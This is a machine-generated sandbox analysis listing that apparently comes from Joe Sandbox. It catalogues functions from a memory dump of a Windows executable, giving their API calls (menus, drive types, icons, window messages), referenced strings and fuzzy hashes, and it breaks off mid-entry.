Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: a3929445404483e7cade0c25ae143dadf61be0dcfeacaa5c09c47eb56356f386
Instruction ID: 5373ad113e3773fd35a166261bd995c3397222a1d70f25c49ff178c0b6a57660
Opcode Fuzzy Hash: a3929445404483e7cade0c25ae143dadf61be0dcfeacaa5c09c47eb56356f386
Instruction Fuzzy Hash: B34151351001449EDB259F68DC88FBD3BA5EB06331F1842A9FE659F1E6C7318D82DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00C2AB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00C4F910), ref: 00C2AB76
GetDriveTypeW.KERNEL32(00000061,00C7A620,00000061), ref: 00C2AC40
_wcscpy.LIBCMT ref: 00C2AC6A

Strings

cdrom, xrefs: 00C2AB92
unknown, xrefs: 00C2AC01
removable, xrefs: 00C2ABA8
all, xrefs: 00C2AB7C
ramdisk, xrefs: 00C2ABEA
fixed, xrefs: 00C2ABBE
network, xrefs: 00C2ABD4

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 19a13a6bc75d2bebd4b23b4f1c8e30d621fa30e80b12c33fbcc048bf2d5c4dac
Instruction ID: 2ccbae8fb32756ce8992da130b5a10eddcf71a47c34fd4aaeb282ef7574e2757
Opcode Fuzzy Hash: 19a13a6bc75d2bebd4b23b4f1c8e30d621fa30e80b12c33fbcc048bf2d5c4dac
Instruction Fuzzy Hash: 9551BD301183519BC710EF15D881EAEB7E5EF84310F14886DF89A976A2DB319E49CB53

Uniqueness

Uniqueness Score: -1.00%

Function 00C488B4 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00C4896E

Strings

@U=u, xrefs: 00C489A4

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: InvalidateRect
String ID: @U=u
API String ID: 634782764-2594219639
Opcode ID: 41371a207102abecd624bbbcb521c8100b46ba97873fb6a46a4225bb445a88e3
Instruction ID: 957490c6005d8f1c2e488f1368b4e212a4c2d403ff8dbafea228438e629eaa87
Opcode Fuzzy Hash: 41371a207102abecd624bbbcb521c8100b46ba97873fb6a46a4225bb445a88e3
Instruction Fuzzy Hash: 2C519530500208BFDF309F25CC85BAD7BA5FB05760F604156F925E62E1DFB1AA88EB51

Uniqueness

Uniqueness Score: -1.00%

Function 00BC2B72 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00BFC547
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00BFC569
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00BFC581
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00BFC59F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00BFC5C0
DestroyIcon.USER32(00000000), ref: 00BFC5CF
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00BFC5EC
DestroyIcon.USER32(?), ref: 00BFC5FB

Part of subcall function 00C4A71E: DeleteObject.GDI32(00000000), ref: 00C4A757

Strings

@U=u, xrefs: 00BFC5C0, 00BFC5EC

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID: @U=u
API String ID: 2819616528-2594219639
Opcode ID: c4be6dc8bad8799474681b62f711e24f9b05910951b79e75a3a4ac49dc0c2c61
Instruction ID: 93b0dbae31de6b4476e8fe3a82623df558eeb71b46ff97ad599f93630b086215
Opcode Fuzzy Hash: c4be6dc8bad8799474681b62f711e24f9b05910951b79e75a3a4ac49dc0c2c61
Instruction Fuzzy Hash: A7514674600209AFDB24DF24DC85FAA7BF5EB58310F1045ACF906972A0DB70ED91DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00BC9997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00BC99C2
__swprintf.LIBCMT ref: 00BC9A0C
__i64tow.LIBCMT ref: 00BFFA0F

Strings

%.15g, xrefs: 00BC9A06
0x%p, xrefs: 00BFF9F1
False, xrefs: 00BFF9D7
True, xrefs: 00BFF9D0

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: fd8c1f2d191a3d7141bba131f41f68eb1807f4ad4ebf3423ab76f06597cc24c9
Instruction ID: 314336b3e3379b1ffc94ec98946e386334e756917a1c346ebce86eb8a507e17a
Opcode Fuzzy Hash: fd8c1f2d191a3d7141bba131f41f68eb1807f4ad4ebf3423ab76f06597cc24c9
Instruction Fuzzy Hash: 6E41B77150420AAFEB24AF39D885F7A73E8EF45300F2044EEE549D7291EEB1D945DB11

Uniqueness

Uniqueness Score: -1.00%

Function 00C473C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C473D9
CreateMenu.USER32 ref: 00C473F4
SetMenu.USER32(?,00000000), ref: 00C47403
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C47490
IsMenu.USER32(?), ref: 00C474A6
CreatePopupMenu.USER32 ref: 00C474B0
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C474DD
DrawMenuBar.USER32 ref: 00C474E5

Strings

F, xrefs: 00C474D1
0, xrefs: 00C473CF

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 5502b52c627dbea1630cd092fa32d6d7a7f7b63b6526bc3f52a25d2ab50e78ac
Instruction ID: 8231a077bce5eb2224b7741b393a60a1d4619d7597c75028f63d748458482f01
Opcode Fuzzy Hash: 5502b52c627dbea1630cd092fa32d6d7a7f7b63b6526bc3f52a25d2ab50e78ac
Instruction Fuzzy Hash: E5412579A00209EFDB21DF64D888BAABBF9FF49310F144129E955A7360D731AA10CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00C19471 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC7F41: _memmove.LIBCMT ref: 00BC7F82

Part of subcall function 00C1B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00C1B0E7

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00C194F6
GetDlgCtrlID.USER32 ref: 00C19501
GetParent.USER32 ref: 00C1951D
SendMessageW.USER32(00000000,?,00000111,?), ref: 00C19520
GetDlgCtrlID.USER32(?), ref: 00C19529
GetParent.USER32(?), ref: 00C19545
SendMessageW.USER32(00000000,?,?,00000111), ref: 00C19548

Strings

ListBox, xrefs: 00C194B3
ComboBox, xrefs: 00C1947E
@U=u, xrefs: 00C19548

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: @U=u$ComboBox$ListBox
API String ID: 1536045017-2258501812
Opcode ID: a6a70738ae3cd721b2fb0742fec2f262bc06085365f6c54fbbe8c9293135f183
Instruction ID: 9bb070dd5c81ed83427362bd275ad7ad0e69e6d06f894c87c14d5af663342a47
Opcode Fuzzy Hash: a6a70738ae3cd721b2fb0742fec2f262bc06085365f6c54fbbe8c9293135f183
Instruction Fuzzy Hash: E721F474900108BBDF00ABA1CCD5FFEBBB5FF4A300F104269B921972A1DB755959EB20

Uniqueness

Uniqueness Score: -1.00%

Function 00C1955C Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC7F41: _memmove.LIBCMT ref: 00BC7F82

Part of subcall function 00C1B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00C1B0E7

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00C195DF
GetDlgCtrlID.USER32 ref: 00C195EA
GetParent.USER32 ref: 00C19606
SendMessageW.USER32(00000000,?,00000111,?), ref: 00C19609
GetDlgCtrlID.USER32(?), ref: 00C19612
GetParent.USER32(?), ref: 00C1962E
SendMessageW.USER32(00000000,?,?,00000111), ref: 00C19631

Strings

ListBox, xrefs: 00C1959E
ComboBox, xrefs: 00C19569
@U=u, xrefs: 00C19631

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: @U=u$ComboBox$ListBox
API String ID: 1536045017-2258501812
Opcode ID: 973ad2d8b9e16f7555b3686c4c550f7ac01406c8215b724af4343ad47f5ffa8d
Instruction ID: 4c16844a462236f6315c60e62d6f880a77e007786575f176697aa3f404abc011
Opcode Fuzzy Hash: 973ad2d8b9e16f7555b3686c4c550f7ac01406c8215b724af4343ad47f5ffa8d
Instruction Fuzzy Hash: 5221B374900208BBDF01AB61CCD5FFEBBB9FF4A300F114159F921971A1DB759959AB20

Uniqueness

Uniqueness Score: -1.00%

Function 00C19645 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00C19651
GetClassNameW.USER32(00000000,?,00000100), ref: 00C19666
_wcscmp.LIBCMT ref: 00C19678
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00C196F3

Strings

largeicons, xrefs: 00C19687
smallicons, xrefs: 00C196BB
SHELLDLL_DefView, xrefs: 00C19672
details, xrefs: 00C196A1
@U=u, xrefs: 00C196F3
list, xrefs: 00C196D5

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: @U=u$SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-1428604138
Opcode ID: b713240e8047ccdbb9cbff9882f8cfe09c0638f6ab974ca97cc3734996a71bf3
Instruction ID: 3e809dc8d621896b058b6ab07499ba1c6cc735156f5f39abc5a6b2258b2ab7c6
Opcode Fuzzy Hash: b713240e8047ccdbb9cbff9882f8cfe09c0638f6ab974ca97cc3734996a71bf3
Instruction Fuzzy Hash: BA115C36248317BAF6012622DC2BEE677DCDB03760F20016AF914A10E1FF716A816668

Uniqueness

Uniqueness Score: -1.00%

Function 00BE7040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00BE707B

Part of subcall function 00BE8D68: __getptd_noexit.LIBCMT ref: 00BE8D68

__gmtime64_s.LIBCMT ref: 00BE7114
__gmtime64_s.LIBCMT ref: 00BE714A
__gmtime64_s.LIBCMT ref: 00BE7167
__allrem.LIBCMT ref: 00BE71BD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BE71D9
__allrem.LIBCMT ref: 00BE71F0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BE720E
__allrem.LIBCMT ref: 00BE7225
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BE7243
__invoke_watson.LIBCMT ref: 00BE72B4

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
Instruction ID: d4256187828bedc1f52cbbf7ed0b31e7fb69bac1d871a891ef1a9c6d2c1daf3b
Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
Instruction Fuzzy Hash: E9710871A44747ABD714DE7ACC81B6AB3E8EF11720F1442BAF614E7681EB70E9448790

Uniqueness

Uniqueness Score: -1.00%

Function 00C22A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C22A31
GetMenuItemInfoW.USER32(00C86890,000000FF,00000000,00000030), ref: 00C22A92
SetMenuItemInfoW.USER32(00C86890,00000004,00000000,00000030), ref: 00C22AC8
Sleep.KERNEL32(000001F4), ref: 00C22ADA
GetMenuItemCount.USER32(?), ref: 00C22B1E
GetMenuItemID.USER32(?,00000000), ref: 00C22B3A
GetMenuItemID.USER32(?,-00000001), ref: 00C22B64
GetMenuItemID.USER32(?,?), ref: 00C22BA9
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C22BEF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C22C03
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C22C24

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 5ea714b0ccfdd74d8c8f0282b9cdbc6c6d68eae79d55ef84ba9d93b741e639ec
Instruction ID: 858919bb1d8dea820708ad4924be6fe047656cef65be5b7ca2c153d5ecc8b6b4
Opcode Fuzzy Hash: 5ea714b0ccfdd74d8c8f0282b9cdbc6c6d68eae79d55ef84ba9d93b741e639ec
Instruction Fuzzy Hash: F061B0B4900269BFEB21CF64EC88EBE7BB8FB01304F140569F85297651D771AE46DB21

Uniqueness

Uniqueness Score: -1.00%

Function 00C47192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00C47214
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00C47217
GetWindowLongW.USER32(?,000000F0), ref: 00C4723B
_memset.LIBCMT ref: 00C4724C
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C4725E
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00C472D6

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 32742773bdc973e50dc95e292a9ace0517c1b2fd4193f924bde00a2482b32495
Instruction ID: 176afba7b1aa177946dfdb480e42fc7d24b32d49b707ee903f3064ec404d7556
Opcode Fuzzy Hash: 32742773bdc973e50dc95e292a9ace0517c1b2fd4193f924bde00a2482b32495
Instruction Fuzzy Hash: FC615B75900208AFDB10DFA4CC81FEE77F8BB09714F144159FA14A72A2D774AE45DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00C1710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00C17135
SafeArrayAllocData.OLEAUT32(?), ref: 00C1718E
VariantInit.OLEAUT32(?), ref: 00C171A0
SafeArrayAccessData.OLEAUT32(?,?), ref: 00C171C0
VariantCopy.OLEAUT32(?,?), ref: 00C17213
SafeArrayUnaccessData.OLEAUT32(?), ref: 00C17227
VariantClear.OLEAUT32(?), ref: 00C1723C
SafeArrayDestroyData.OLEAUT32(?), ref: 00C17249
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C17252
VariantClear.OLEAUT32(?), ref: 00C17264
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C1726F

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: b454171c868dda94a4a77080206f8c80a3f0191e2ed5d22df304202e6d8326b0
Instruction ID: 7c56d8646cb5120ad664bb97974c6dfc29ee1317eeb7243e2330ab348355dde7
Opcode Fuzzy Hash: b454171c868dda94a4a77080206f8c80a3f0191e2ed5d22df304202e6d8326b0
Instruction Fuzzy Hash: 45415135900219EFCF00DF64D848EEEBBB8FF49354F008169F915A7261CB30A986DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C4D74C Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC2612: GetWindowLongW.USER32(?,000000EB), ref: 00BC2623

GetSystemMetrics.USER32(0000000F), ref: 00C4D78A
GetSystemMetrics.USER32(0000000F), ref: 00C4D7AA
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00C4D9E5
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00C4DA03
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00C4DA24
ShowWindow.USER32(00000003,00000000), ref: 00C4DA43
InvalidateRect.USER32(?,00000000,00000001), ref: 00C4DA68
DefDlgProcW.USER32(?,00000005,?,?), ref: 00C4DA8B

Strings

@U=u, xrefs: 00C4DA03, 00C4DA24

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID: @U=u
API String ID: 1211466189-2594219639
Opcode ID: 0748c9e517d020bf36e4fdcf52aec9c031dd81b430864b86df64af4a6d0522f4
Instruction ID: d072bde76a1730ad9988972b72516e95125f1cab6f0d20d8092a0cb78abcfb3e
Opcode Fuzzy Hash: 0748c9e517d020bf36e4fdcf52aec9c031dd81b430864b86df64af4a6d0522f4
Instruction Fuzzy Hash: ADB19831A00225EBDF14DF69C9C57BD7BB1BF04711F088069EC5A9B299DB34AA50DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00BC2E26 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00BC2EAE

Part of subcall function 00BC1DB3: GetClientRect.USER32(?,?), ref: 00BC1DDC
Part of subcall function 00BC1DB3: GetWindowRect.USER32(?,?), ref: 00BC1E1D
Part of subcall function 00BC1DB3: ScreenToClient.USER32(?,?), ref: 00BC1E45

GetDC.USER32 ref: 00BFCF82
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00BFCF95
SelectObject.GDI32(00000000,00000000), ref: 00BFCFA3
SelectObject.GDI32(00000000,00000000), ref: 00BFCFB8
ReleaseDC.USER32(?,00000000), ref: 00BFCFC0
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00BFD04B

Strings

U, xrefs: 00BFCF20
@U=u, xrefs: 00BFCF95

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: @U=u$U
API String ID: 4009187628-4110099822
Opcode ID: b7313e99856ceaa462f89f370c6ce5bab0aaa6d2d50cf1cb31f839c925ca7d36
Instruction ID: e7df1c9b25abb8ea9c48c7a9fbeffb0d05f9c3096b2db478e4d44191182d4797
Opcode Fuzzy Hash: b7313e99856ceaa462f89f370c6ce5bab0aaa6d2d50cf1cb31f839c925ca7d36
Instruction Fuzzy Hash: 1171B13050020DDFCF219F64C994BBA7BF6FF49350F1442A9EE55AB1A6C731888ADB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C35A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

